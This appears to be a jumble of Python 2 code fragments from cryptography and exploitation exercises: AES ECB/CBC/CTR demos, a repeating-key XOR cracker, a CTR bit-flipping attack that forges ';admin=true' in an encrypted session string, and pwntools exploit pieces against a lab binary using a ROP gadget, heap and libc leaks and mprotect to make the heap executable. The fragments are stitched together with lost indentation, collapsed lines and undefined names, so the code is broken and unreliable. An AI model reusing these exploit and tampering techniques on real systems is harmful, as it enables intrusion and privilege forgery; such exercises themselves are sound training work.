#!/usr/bin/python from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes from cryptography.hazmat.backends import default_backend from binascii import hexlify as hexa from os import urandom print "Running example AES block cipher" # pick a random 16-byte key using Pythons's crypto PRNG k = urandom(16) print "k = %s" % (hexa(k)) # create an instance of AES-128 to encrypt a single block cipher = Cipher(algorithms.AES(k), modes.ECB(), backend=default_backend()) aes_encrypt = cipher.encryptor() # set plaintext block p to the all-zero string p = '\x00' * 16 # encrypt plaintext p to ciphertext c c = aes_encrypt.update(p) + aes_encrypt.finalize() print "enc(%s) = %s" % (hexa(p), hexa(c)) # decrypt ciphertext c to plaintext p aes_decrypt = cipher.decryptor() p = aes_decrypt.update(c) + aes_decrypt.finalize() print "dec(%s) = %s" % (hexa(c), hexa(p))
def blocks(data):
split = [hexa(data[i:i + BLOCKLEN]) for i in range(0, len(data), BLOCKLEN)]
return ' '.join(split)
from base64 import b64decode
from Crypto.Cipher import AES
from Crypto.Util import Counter
from binascii import hexlify as hexa
from os import urandom
from struct import unpack, pack
BLOCK_SIZE = 16
# Useful usage of CTR:
k = urandom(16)
print "Key k = %s" % hexa(k)
# Starting value for counter:
nonce = unpack('<Q', urandom(8))[0]
# Encrypting:
ctr = Counter.new(128, initial_value=nonce)
aes = AES.new(k, AES.MODE_CTR, counter=ctr)
p = '\x00\x01\x02\x03'
c = aes.encrypt(p)
print "enc(%s) = %s" % (hexa(p), hexa(c))
# Decrypting: -> Decryption is identical to encryption
ctr = Counter.new(128, initial_value=nonce)
aes = AES.new(k, AES.MODE_CTR, counter=ctr)
p = aes.encrypt(c)
print '-'*100
print 'number: ' + str(number),
for x in example_encrypted:
try:
first_bytes += x[number]
except: pass
i = 0
for x in xrange(256):
test = ''
for byte in first_bytes:
test += chr(ord(byte) ^ x)
if bool(re.search("[^a-zA-Z0-9'\s./?,\-\!\"\;\:]",test)) == False and test.count("\"") < 3:
print ' -> ' + hexa(chr(x)) + '\n' + test
KEY += chr(x)
PLAINTEXT_LIST.append([test,''])
if i != 0:
print '\t\t\t\t\t\t\t\t\x1b[6;30;42m---------------->DOUBLE\x1b[0m'
PLAINTEXT_LIST[len(PLAINTEXT_LIST)-1][1] = test
i += 1
max_number = number
print 'POSSIBLE KEY: '
print hexa(KEY) + '\n\n\n'
# print PLAINTEXT_LIST
BLOCKLEN = 16
def blocks(data):
split = [hexa(data[i:i + BLOCKLEN]) for i in range(0, len(data), BLOCKLEN)]
return ' '.join(split)
def xorblocks(b1, b2):
return ''.join(chr(ord(a) ^ ord(b)) for a, b in zip(b1, b2))
# pick a random key
k = urandom(16)
print("k = %s" % hexa(k))
# pick a random IV
iv = urandom(16)
print("iv = %s\n" % hexa(iv))
# pick an instance of AES in CBC mode
aes = AES.new(k, AES.MODE_CBC, iv)
p = '\x00' * BLOCKLEN + '\x41' * BLOCKLEN + '\xff' * BLOCKLEN
c = aes.encrypt(p)
print("enc:\n%s\n->\n%s\n" % (blocks(p), blocks(c)))
aes = AES.new(k, AES.MODE_CBC, iv)
cc = c + c + c
pp = aes.decrypt(cc)
print("dec:\n%s\n->\n%s\n" % (blocks(cc), blocks(pp)))
def encrypt(plaintext, k, nonce):
ctr = Counter.new(128, initial_value=nonce)
aes = AES.new(k, AES.MODE_CTR, counter=ctr)
c = aes.encrypt(str(plaintext))
return c
userdata = 'XadminXtrue'
prepend = "comment1=cooking%20MCs;userdata="
append = ";comment2=%20like%20a%20pound%20of%20bacon"
res = prepend + quote_out(userdata) + append
ciphertext = bytearray(encrypt(res, k, nonce))
print 'Session encrypted: ' + hexa(ciphertext)
decrypted = encrypt(ciphertext, k, nonce)
print 'Session decrypted: ' + decrypted
print check_admin(decrypted)
print '\n\nTRYING TO TAMPER:'
decrypted = ''
for x in xrange(255):
ciphertext[32] = x
for y in xrange(255):
ciphertext[38] = y
decrypted = encrypt(ciphertext, k, nonce)
if bool(re.search(r";admin=true", decrypted)) == True:
print 'First char tampered: ' + hexa(chr(x))
p.recvuntil(':')
gadget = p32(0x0807e372)
pattern = 'D' * 132 + p32(0x0) + p32(0x0) + gadget
p.sendline(pattern)
p.sendline('4')
p.recvuntil(':')
print p.recvuntil('Enter Choice: ')
p.sendline(stack)
leak = p.recvuntil('Enter Choice: ')
heap = leak[73:73 + 4]
print hexa(heap)
ba = bytearray.fromhex(hexa(heap))
ba.reverse()
print 'Heap address: ' + hex(struct.unpack(">L", ba)[0] - 0x19d8)
# mprotect(heap_address, size, flag (rwx = 0x7))
return_after_mprotect = p32(struct.unpack(">L", ba)[0] - 0x19d8 + 0x1aec)
print 'Return_after_mprotect: ' + hex(
struct.unpack(">L", ba)[0] - 0x19d8 + 0x1aec)
stack2 = '1' + '\x00' + 'A' * 6 + p32(0x806f340) + return_after_mprotect + p32(
struct.unpack(">L", ba)[0] - 0x19d8) + p32(0x22000) + p32(0x7)
p.sendline('1')
from binascii import hexlify as hexa
# context.log_level = 'debug'
p = process('/levels/lab08/lab8B')
raw_input('Press Enter...')
p.sendline('3')
p.recv(2048)
p.sendline('1')
a = p.recv(100 - 40)
leak = a[51:51 + 4]
print 'Leak: 0x' + hexa(p32(struct.unpack(">L", leak)[0]))
adres = hexa(p32(struct.unpack(">L", leak)[0]))
adres2 = int(adres, 16) + 0x190e27
p.sendline('1')
p.sendline('1')
p.sendline('\x41')
p.sendline('23487')
p.sendline('11111')
p.sendline('11111')
p.sendline('1')
p.sendline('11111')
from binascii import hexlify as hexa
from os import urandom
print "Running example AES CBC-mode block cipher"
BLOCKLEN = 16
# the blocks() function splits data string into space-speparated blocks
def blocks(data):
split = [hexa(data[i:i + BLOCKLEN]) for i in range(0, len(data), BLOCKLEN)]
return ' '.join(split)
k = urandom(16)
print "k = %s" % hexa(k)
# pick a random Initialization Vector (IV)
iv = urandom(16)
print "iv = %s" % hexa(iv)
# pick an instance of AES in CBC-mode
aes = Cipher(algorithms.AES(k), modes.CBC(iv),
backend=default_backend()).encryptor()
p = '\x00' * BLOCKLEN * 2
c = aes.update(p) + aes.finalize()
print "enc(%s) = %s" % (blocks(p), blocks(c))
#!/usr/bin/python from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes from cryptography.hazmat.backends import default_backend from binascii import hexlify as hexa from os import urandom print "Running example AES ECB-mode block cipher" BLOCKLEN = 16 def blocks(data): split = [hexa(data[i:i+BLOCKLEN]) for i in range(0, len(data), BLOCKLEN)] return ' '.join(split) k = urandom(16) print "k = %s" % hexa(k) #create an instance of AES-128 to encrypt and decrypt cipher = Cipher(algorithms.AES(k), modes.ECB(), backend=default_backend()) aes_encrypt = cipher.encryptor() #set plaintext block p to all zero string p = '\x00'*BLOCKLEN*2 #encrypt plaintext p to ciphertext c c = aes_encrypt.update(p) + aes_encrypt.finalize() print "enc(%s) = %s" % (blocks(p), blocks(c))